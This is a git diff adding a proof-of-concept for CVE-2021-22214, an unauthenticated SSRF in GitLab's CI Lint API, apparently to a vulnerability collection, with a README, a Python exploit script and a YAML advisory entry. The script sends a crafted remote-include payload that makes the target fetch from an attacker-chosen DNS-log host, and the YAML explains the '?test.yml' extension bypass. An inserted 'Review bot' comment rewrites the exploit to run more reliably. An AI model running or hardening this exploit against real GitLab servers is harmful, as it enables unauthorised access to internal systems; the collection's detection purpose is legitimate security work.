diff --git a/cve/gitlab/2021/CVE-2021-22214/README.md b/cve/gitlab/2021/CVE-2021-22214/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..f288e84b47d7032b4fc15e19922410960b2142a0
--- /dev/null
+++ b/cve/gitlab/2021/CVE-2021-22214/README.md
@@ -0,0 +1,53 @@
+# CVE-2021-22214
+Gitlab CI Lint API未授权 SSRF漏洞 (CVE-2021-22214)
+
+#### Usage
+
+- help
+
+```
+$ python3 gitlab_ssrf.py
+
+===============================================================
+ _____ _ _ _ _ _____ _____ _____ ______
+ / ____(_) | | | | | / ____/ ____| __ \| ____|
+ | | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__
+ | | |_ | | __| | / _` | '_ \ \___ \___ \| _ /| __|
+ | |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| |
+ \_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_|
+
+ CVE-2021-22214 Powered by r0cky Team ZionLab
+===============================================================
+
+Example:
+ python3 gitlab_ssrf.py
+
+```
+
+- use
+
+target: 192.168.80.136
+
+![1624336331315](img/1624336331315.png)
+
+```
+$ python3 gitlab_ssrf.py http://192.168.80.136/ ssrf.sleg0x.dnslog.cn
+
+===============================================================
+ _____ _ _ _ _ _____ _____ _____ ______
+ / ____(_) | | | | | / ____/ ____| __ \| ____|
+ | | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__
+ | | |_ | | __| | / _` | '_ \ \___ \___ \| _ /| __|
+ | |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| |
+ \_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_|
+
+ CVE-2021-22214 Powered by r0cky Team ZionLab
+===============================================================
+
+[+] 可能存在 GitLab SSRF 漏洞,请查看dnslog记录.
+```
+
+![1624336369016](img/1624336369016.png)
+
+
+
diff --git a/cve/gitlab/2021/CVE-2021-22214/gitlab_ssrf.py b/cve/gitlab/2021/CVE-2021-22214/gitlab_ssrf.py
new file mode 100644
index 0000000000000000000000000000000000000000..b16b4e33c0adffb282cd15930598451df50c1ddd
--- /dev/null
+++ b/cve/gitlab/2021/CVE-2021-22214/gitlab_ssrf.py
@@ -0,0 +1,52 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+"""
+@Author: r0cky
+@Time: 2021/6/22-11:09
+"""
+import json
+import sys
+import requests
+import urllib3
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def banner():
+ print("""
+===============================================================
+ _____ _ _ _ _ _____ _____ _____ ______
+ / ____(_) | | | | | / ____/ ____| __ \| ____|
+ | | __ _| |_| | __ _| |__ | (___| (___ | |__) | |__
+ | | |_ | | __| | / _` | '_ \ \___ \\___ \| _ /| __|
+ | |__| | | |_| |___| (_| | |_) | ____) |___) | | \ \| |
+ \_____|_|\__|______\__,_|_.__/ |_____/_____/|_| \_\_|
+
+ CVE-2021-22214 Powered by r0cky Team ZionLab
+===============================================================
+""")
+
+def poc(url, dnshost):
+
+ api="/api/v4/ci/lint"
+ data = {"include_merged_yaml": True, "content": "include:\n remote: http://{}/api/v1/targets?test.yml".format(dnshost)}
+
+ headers = {"Content-Type": "application/json"}
+
+ r = requests.post(url=url+api, data=json.dumps(data), headers=headers, verify=False)
+ if r.status_code == 200:
+ if dnshost in r.json()["errors"][0]:
+ print ("[+] 可能存在 GitLab SSRF 漏洞,请查看dnslog记录.")
+ return
+ print ("[-] 不存在 GitLab SSRF 漏洞!")
+
+def main():
+ banner()
+ if (len(sys.argv) == 3):
+ url = sys.argv[1]
+ dnshost = sys.argv[2]
+ poc(url, dnshost)
+ else:
+ print("Example: \n python3 " + sys.argv[0] + " \n")
+
+if __name__ == '__main__':
+ main()
\ No newline at end of file
diff --git a/cve/gitlab/2021/CVE-2021-22214/img/1624336331315.png b/cve/gitlab/2021/CVE-2021-22214/img/1624336331315.png
new file mode 100644
index 0000000000000000000000000000000000000000..b445c47c1c267a2d8430e5cec0978e71dc2b5b7d
Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22214/img/1624336331315.png differ
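Review bot: In `poc`, `r.json()["errors"][0]` runs on every 200 reply, so a target whose lint response carries no `errors` list (a valid-config answer, or a non-JSON 200 served by a proxy or WAF) aborts the script with KeyError/IndexError/JSONDecodeError instead of printing a verdict, and `requests.post` has no `timeout`, so a stalled target blocks the scan indefinitely — a real concern here, since the server is being asked to fetch the remote include before it answers. The rewrite below reads `errors` defensively, scans every entry, bounds the request, and documents why the remote URL ends in `?test.yml` (the extension-check bypass described in this commit's metadata YAML). The usage text in `main`, `"Example: \n python3 " + sys.argv[0] + " \n"`, omits the two required positional arguments; `"Usage: python3 " + sys.argv[0] + " <gitlab-url> <dnslog-host>"` would match the README invocation. A 200 with the host echoed back in an error message only shows the payload was parsed, so, as the existing message already says, the DNS-log hit remains the actual confirmation.
```python
def poc(url, dnshost):
    api = "/api/v4/ci/lint"
    # "?test.yml" satisfies the file-extension check on the remote include;
    # the host part is what the server resolves/fetches (the SSRF signal).
    data = {"include_merged_yaml": True, "content": "include:\n remote: http://{}/api/v1/targets?test.yml".format(dnshost)}
    # … unchanged: headers …
    # timeout: the target performs an outbound fetch before replying; never wait forever
    r = requests.post(url=url + api, data=json.dumps(data), headers=headers, verify=False, timeout=15)
    if r.status_code == 200:
        try:
            errors = r.json().get("errors") or []
        except ValueError:  # non-JSON 200 (proxy/WAF page)
            errors = []
        if any(dnshost in str(e) for e in errors):
            print("[+] 可能存在 GitLab SSRF 漏洞,请查看dnslog记录.")
            return
    print("[-] 不存在 GitLab SSRF 漏洞!")
```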
diff --git a/cve/gitlab/2021/CVE-2021-22214/img/1624336369016.png b/cve/gitlab/2021/CVE-2021-22214/img/1624336369016.png
new file mode 100644
index 0000000000000000000000000000000000000000..6021e910cc1d3fbc67d2e54803d846f3dfe91576
Binary files /dev/null and b/cve/gitlab/2021/CVE-2021-22214/img/1624336369016.png differ
diff --git a/cve/gitlab/2021/yaml/CVE-2021-22214.yaml b/cve/gitlab/2021/yaml/CVE-2021-22214.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..37a69cb5a0ff4a231a62e1afda510e65544366b1
--- /dev/null
+++ b/cve/gitlab/2021/yaml/CVE-2021-22214.yaml
@@ -0,0 +1,23 @@
+id: CVE-2021-22214
+source: https://github.com/aaminin/CVE-2021-22214
+info:
+ name: GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。
+ severity: high
+ description: |
+ Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式。而根据其说明文档文档,其include 操作支持remote选项,用于获取远端的yaml。因此在此处将remote参数设置为本地回环地址,同时由于后端会检查最后扩展名,加上?test.yaml 即可绕过。远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。
+ scope-of-influence:
+ 13.10.5 > GitLab >= 10.5
+ 13.11.5 > GitLab >= 13.11
+ 13.12.2 > GitLab >= 13.12
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-22214
+ - https://www.tenable.com/plugins/nessus/152483
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22214
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
+ cve-id: CVE-2021-22214
+ cwe-id: CWE-918
+ cnvd-id: None
+ kve-id: None
+ tags: cve2021, SSRF, 未授权漏洞
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index f822acc2b69f179a6e97f17564d06e258e4fe60d..789ee462a1fc668ecb4670b9bc4d4eb7bfaaba5e 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -29,6 +29,7 @@ cve:
 - CVE-2023-22809
 gitlab:
 - CVE-2021-22205
+ - CVE-2021-22214
 - CVE-2022-1162
 confluence:
 - CVE-2019-3396